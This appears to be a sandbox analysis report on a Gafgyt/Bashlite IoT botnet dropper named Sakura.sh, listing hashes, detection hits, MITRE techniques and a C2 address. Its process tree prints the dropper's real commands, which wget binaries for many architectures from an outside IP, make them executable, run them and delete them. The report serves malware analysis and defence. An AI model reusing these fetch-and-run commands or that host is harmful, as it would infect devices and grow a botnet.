gafgyt | 320b20de26db0437f76a3f7f1e7d8980e7fb254534fef0adf7220fe39a85c06b

Analysis

max time kernel
149s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
18/02/2025, 19:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sakura.sh
Size

2KB
MD5

a74c4d7f9905b87261427eebca20609b
SHA1

9b3941f476af0f3661bec0bd4915f8cc6a843179
SHA256

320b20de26db0437f76a3f7f1e7d8980e7fb254534fef0adf7220fe39a85c06b
SHA512

5ee580c525590bf19f2b792d238c3c4a0de25f4c7a118097b0c96fc21ed55c7e6555f3b202cafcd989d4c9cd36bf7e5e545e11bc57ec75a8ddf8770cc4a3a5d0

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

205.185.115.242:12345

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt
behavioral2/files/fstream-9.dat	family_gafgyt
behavioral2/files/fstream-10.dat	family_gafgyt
behavioral2/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
779	chmod
801	chmod
807	chmod
823	chmod
749	chmod
761	chmod
766	chmod
788	chmod
794	chmod
815	chmod
718	chmod
754	chmod
772	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	719	Sakura.sh
/tmp/m-p.s-l.Sakura	750	Sakura.sh
/tmp/s-h.4-.Sakura	755	Sakura.sh
/tmp/x-8.6-.Sakura	762	Sakura.sh
/tmp/a-r.m-6.Sakura	767	Sakura.sh
/tmp/x-3.2-.Sakura	773	Sakura.sh
/tmp/a-r.m-7.Sakura	780	Sakura.sh
/tmp/p-p.c-.Sakura	789	Sakura.sh
/tmp/i-5.8-6.Sakura	795	Sakura.sh
/tmp/m-6.8-k.Sakura	802	Sakura.sh
/tmp/p-p.c-.Sakura	808	Sakura.sh
/tmp/a-r.m-4.Sakura	816	Sakura.sh
/tmp/a-r.m-5.Sakura	824	Sakura.sh

Reads system routing table 1 TTPs 6 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	m-6.8-k.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	a-r.m-4.Sakura
File opened for reading	/proc/net/route	a-r.m-5.Sakura

Reads system network configuration 1 TTPs 6 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	m-6.8-k.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	a-r.m-4.Sakura
File opened for reading	/proc/net/route	a-r.m-5.Sakura

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/i-5.8-6.Sakura	wget
File opened for modification	/tmp/m-i.p-s.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget
File opened for modification	/tmp/m-6.8-k.Sakura	wget
File opened for modification	/tmp/a-r.m-4.Sakura	wget
File opened for modification	/tmp/a-r.m-5.Sakura	wget

/tmp/Sakura.sh
/tmp/Sakura.sh
1⤵
- Executes dropped EXE
PID:638
- /usr/bin/wget
  wget http://205.185.115.242/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:640
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  PID:719
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:721
- /usr/bin/wget
  wget http://205.185.115.242/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:723
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  PID:750
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:752
- /usr/bin/wget
  wget http://205.185.115.242/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:753
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  PID:755
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:757
- /usr/bin/wget
  wget http://205.185.115.242/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:758
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  PID:762
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:764
- /usr/bin/wget
  wget http://205.185.115.242/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:765
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:767
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:770
- /usr/bin/wget
  wget http://205.185.115.242/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:771
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/x-3.2-.Sakura
  ./x-3.2-.Sakura
  2⤵
  PID:773
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:775
- /usr/bin/wget
  wget http://205.185.115.242/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:776
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  PID:780
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:782
- /usr/bin/wget
  wget http://205.185.115.242/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:783
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:789
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:792
- /usr/bin/wget
  wget http://205.185.115.242/i-5.8-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:793
- /bin/chmod
  chmod +x i-5.8-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:794
- /tmp/i-5.8-6.Sakura
  ./i-5.8-6.Sakura
  2⤵
  PID:795
- /bin/rm
  rm -rf i-5.8-6.Sakura
  2⤵
  PID:797
- /usr/bin/wget
  wget http://205.185.115.242/m-6.8-k.Sakura
  2⤵
  - Writes file to tmp directory
  PID:798
- /bin/chmod
  chmod +x m-6.8-k.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:801
- /tmp/m-6.8-k.Sakura
  ./m-6.8-k.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:802
- /bin/rm
  rm -rf m-6.8-k.Sakura
  2⤵
  PID:805
- /usr/bin/wget
  wget http://205.185.115.242/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:806
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:808
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:811
- /usr/bin/wget
  wget http://205.185.115.242/a-r.m-4.Sakura
  2⤵
  - Writes file to tmp directory
  PID:812
- /bin/chmod
  chmod +x a-r.m-4.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:815
- /tmp/a-r.m-4.Sakura
  ./a-r.m-4.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:816
- /bin/rm
  rm -rf a-r.m-4.Sakura
  2⤵
  PID:819
- /usr/bin/wget
  wget http://205.185.115.242/a-r.m-5.Sakura
  2⤵
  - Writes file to tmp directory
  PID:820
- /bin/chmod
  chmod +x a-r.m-5.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/a-r.m-5.Sakura
  ./a-r.m-5.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:824
- /bin/rm
  rm -rf a-r.m-5.Sakura
  2⤵
  PID:827

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.Sakura

Filesize
98KB

MD5
01f5fbf7985ae482564d90cd963281b0

SHA1
40c1567b032263169c34a651f836259692d231b8

SHA256
79f997a3f15c7c213a8e75f541ae238dc0ca97bb9001ecf161b6f8f0ae4ab441

SHA512
4e5432bb3163e85d5091e19b515ca8ccfe4390e0990791106b7c0b18307191473695b382c77486399e5fcb62039edd6f84c10eb3e99151a96651fa5b94ad6755

Download Submit
/tmp/a-r.m-6.Sakura

Filesize
118KB

MD5
5210d5c1c5099aec46710b2fc4e4eb76

SHA1
ad4eb22c96f80cfc575af6557052175b58a5e739

SHA256
a9e90f6924b1b8558e038ef8ae762960f517e2cdeecdb5ef788003a5a8b4a215

SHA512
42d9403ecf7985accc862fe94fae60774f65f1ebea2d762c9ab8675d72caf7eec9bded7c2f873548ebe3f0d19a3c4e6052dace1f004e3e0e048e1c31aad3a1ec

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
91KB

MD5
bcfa582be35ec5ad8ba10c5805734741

SHA1
93b8abcf8896c4cd7796724f00d6f9204ffa3afe

SHA256
c0fd72de0d01c70a92f7af15a9433169c6c2f93629f4548c44f86b9bc2108b3a

SHA512
ea58a384b585a6dbf59992cdb6acca7285d9dcb98152603a043ba4f04a246c598f9640a6424c1521ff71b3e3fd450c708d1a28566f536ceb13ca18ca03ed7970

Download Submit
/tmp/i-5.8-6.Sakura

Filesize
96KB

MD5
ed05febe0dea37272042a0f7c4fe1cd7

SHA1
af1a03dcd635b2cc5f5fed5fc76e0e6785a2e429

SHA256
5c15aa6f38e9102e4a60be81e7f59b6717e589e36cb74fc76a2c6002b70737ee

SHA512
50653911177712d80ecf1966ab55ae3da762c17620bb22f16096cfb7a08ca73b3b916acd2572925f84f916577f2b5b9f39eecd8080a74d962293fc3c7bcad24f

Download Submit
/tmp/m-6.8-k.Sakura

Filesize
156KB

MD5
f4d42a8e8e52da4dc54fae87c0f2ef90

SHA1
4ff0093d1536cd8de371aaa0b53f7bf84290a0e4

SHA256
2e4d75304306fff897092b87266be8fa5ac87f90025d6e55c4b5352a79a00b5d

SHA512
a72337cfdce093b7566d47dffc3b7e923d253f23b936619f8ffe6899c18953d6e1f0836538a704b4eb148392bc72cb382f34474362a9e2f9f3fbe8b1eeac8263

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
123KB

MD5
488388cbab02fb43963a915d74b262c1

SHA1
09011bf0c0a2e445303100c2b2c10e90bb229f93

SHA256
004ae4e6baf52c9730a60c3246ad3bbe00e0aac5cd101dd656091dabd0f021e2

SHA512
22447a7ef4d886448cb081fc29f3b3dfd5f3b5f984145aa513daf46f1a8a8c849d826ad01f41d35f80763d0382b791c3d754d6e30520fbb2c271f7a182414767

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
123KB

MD5
205e86146e3b96a3a8711eb9c96be1d5

SHA1
231da13708efa347516e0b196d06a6baa7a1d083

SHA256
50c62d4d8b0c672aa473b57de4efa8373f7b7b2a3b3b8489af9bf96e52bb48a2

SHA512
709c90f5a89437c0a14bce1a16a2e26d207787236073c246c1ea0767c631e616290342cea234405ba73f2a6bdc797824547d0252ac9aad7414b9dadb4521d980

Download Submit
/tmp/p-p.c-.Sakura

Filesize
105KB

MD5
1e34326780f5b572a07461e4635a1587

SHA1
8f515ed9d8fdbfd771b5f975fdfd78e08726d7c3

SHA256
b2349a7cbd761d55bac7d3a6c142019d8d67574b94dd34c54a31cda23390e5a6

SHA512
578b6e0c10076bd71a3c2e27c58875fd2c24cb903f950c9b3379594d23dea8bdcaf164ad30f0c115cf7642440ae929b3f83533f17e94e3edc076ed51ac89fd19

Download Submit
/tmp/s-h.4-.Sakura

Filesize
86KB

MD5
493b808fa194b677b96ef49ab5750d20

SHA1
0ae5abc167e5b5358dfd2b5742769247f65ee463

SHA256
81e627bbb724b2e95a5776b30c151f0db4e8dd0a3228aaa6730c43b8bcdc989d

SHA512
2605f61bd12a70213780b35911028c15af6e9f65276d9d196a567b8b6cf3f23d96dd29ac831a5e525ff7019ef9009fbc1376e36c9b1d55af55eaf0b35c190109

Download Submit
/tmp/x-3.2-.Sakura

Filesize
83KB

MD5
3608d5eedba835167a0ee2f144cb0ebb

SHA1
5cf625c8412944e48c7da813004fe3f2c4ad998a

SHA256
f2d0e09c0bfafcbd4c34d17876ba904609166385a98d939e42835afa08fcfad6

SHA512
17e08ccde34126d235b26d0747161e4b3bfec6dec9de6b79e53365b8e43dcbae9806e1904e230f99db90e4bd2d222ba04641e0852477c0af95bfa1abed063103

Download Submit
/tmp/x-8.6-.Sakura

Filesize
92KB

MD5
5c777ad1d6836b738641c5ac2f74ee9c

SHA1
80ba07796df9fd6880dad816258c653965d399b2

SHA256
425a0a8c30db2392ee0417bbc358e2d981a91bf019b120ad1c26232dfbcd786a

SHA512
5a0c4ecfe245d769b314268e09ddd01ddda814e3c936572764126a09c2cb75cbbd3c4a3431be434e2a0173807ee4cb0c3d8d254ef251916227ad8191fd045a7f

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads